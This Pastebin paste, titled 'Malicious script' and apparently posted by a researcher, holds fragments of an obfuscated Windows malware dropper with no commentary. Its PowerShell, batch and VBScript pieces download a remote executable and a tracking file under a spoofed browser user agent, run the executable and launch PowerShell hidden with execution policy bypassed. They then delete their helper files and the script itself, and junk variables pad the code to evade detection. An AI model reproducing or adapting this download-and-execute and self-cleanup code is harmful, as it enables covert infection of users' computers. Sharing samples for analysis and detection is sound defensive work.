dynamoo

Malicious script

Jul 22nd, 2015
376
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <text10>$njqkwdnjkqw='jwqdnkqwhj21kjh1j21';
  2. $qbjwdjqwbdq='1j2ehkj12h jk12hekj21 ';
  3. $down = New-Object System.Net.WebClient;
  4. $jqwdnjqkwdbj='n21jek12ehj 12hejk21 hejk';
  5. $file = $pths+$nnm+'.'+'e'+'xe';
  6. $statsfile = $pths+'444.jpg';
  7. $down.headers[''+'User-Agent'] = ''+'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25'+'';
  8. $dasdw='asdgjasd';
  9. $down.DownloadFile($ggtt,$file);
  10. $down.DownloadFile($stat,$statsfile);
  11. $asndjkashdas='hqugdhjgqw hj2gjh1gd hj12ghej1';
  12. $ScriptDir = $MyInvocation.ScriptName;
  13. $vbsFilePath = $pths+$wehs+'.'+'v'+'bs'+'';
  14. $statFilePath = 'c:\Users\MM\AppData\Local\Temp\444'+'.'+'jpg';
  15. $btFilePath = $pths+$wehs+'.'+'b'+'at';
  16. $psFilePath = $pths+$wehs+'.'+'ps'+'1';
  17. $asdhjqgwdq='qhwgdjqwghdjqw';
  18. $qwbhg21jd21h='jakshdjhagsdasd';
  19. Start-Sleep -s 13;
  20. cmd.exe /c $file;
  21. $file1 = gci $vbsFilePath -Force
  22. $nqjwdhgjqwd='qvdhqgwjdgwq';
  23. $file2 = gci $btFilePath -Force
  24. $file3 = gci $psFilePath -Force
  25. $kasldds = $vbsFilePath
  26. If (Test-Path $kasldds){ Remove-Item $kasldds }
  27. If (Test-Path $btFilePath){ Remove-Item $btFilePath }
  28. If (Test-Path $statFilePath){ Remove-Item $statFilePath }
  29. $asbdhjags = 'jahdjkhdjk21 21hjkhe jkhsakhd assd';
  30. If (Test-Path $file){ Remove-Item $file }
  31. Remove-Item $MyINvocation.InvocationName</text10>
  32. <text20>ping 3.2.1.1 -n 2
  33. chcp 1251
  34. :nuwqhduiw
  35. set Rts2="vb"
  36. set Rts1="."
  37. set Rts3="s"</text20>
  38. <text21>:byqdyqwgjhg
  39. cscript.exe %Rts4%%Rts1%%Rts2%%Rts3%
  40. exit</text21>
  41. <text30>Dim dff
  42. dff = 68
  43. swdff = 68
  44. currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))
  45. Set objFSO=CreateObject("Scripting.FileSystemObject")
  46. huih = ".ps"&"1"
  47. nuaaa = "powerShell.exe"</text30>
  48. <text31>Set objShell = CreateObject("Wscript.shell")
  49. objShell.Run ""&nuaaa&" -noexit -ExecutionPolicy bypass -noprofile -file " & currentFile,0,true</text31>
  50. <stext1>@echo off
  51. :wdhqgdhjg
  52. :jqwidqwdh
  53. ping 1.2.3.1 -n 2
  54. set ggtt="bs"</stext1>
  55. <stext2>cscript.exe %trfd%%nmsj%".v"%ggtt%
  56. ping 2.2.1.1 -n 2
  57. :windows
  58. %trfd%%exds%".exe"
  59. :loop
  60. ping 1.3.1.2 -n 1
  61. set tar1=%nmsj%".bat"
  62. set stat="444.png"
  63. del %trfd%%nmsj%".v"%ggtt%
  64. del %trfd%%tar1%
  65. del %trfd%%stat%
  66. if exist %trfd%%tar1% goto loop
  67. if exist %trfd%%nmsj%".vbs" goto loop
  68. exit</stext2>
  69.  
  70. <stext3>frgea ="M"+"SX"+"ML2.ServerX"+"MLH"+"T"+"T"+Chr(80)+""
  71. Set objXMLHTTP = CreateObject(frgea)
  72. Set sFs = CreateObject(frgea)
  73. objXMLHTTP.open "G"+"ET", strRT, False
  74. sFs.open "GET", statRT, False
  75. objXMLHTTP.send()
  76. sFs.send()
  77. If objXMLHTTP.Status = 200 Then
  78. uwqhda = "AD"&"ODB."
  79. jaisd = uwqhda
  80. Set objADOStream = CreateObject(jaisd+Chr(Sgn(-4)+84)+""&"tr"&"eam"&"")
  81. objADOStream.Open
  82. objADOStream.Type = 1
  83. objADOStream.Write objXMLHTTP.ResponseBody
  84. objADOStream.Position = 0
  85. objADOStream.SaveToFile strTecation
  86. objADOStream.Close
  87. Set objADOStream = Nothing
  88. End if
  89. Set objXMLHTTP = Nothing
  90. uhqgwduqgwd = "qihwduiqwudqwi hdqwhd"
  91. Set objShell = CreateObject("WScript.Shell")</stext3>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×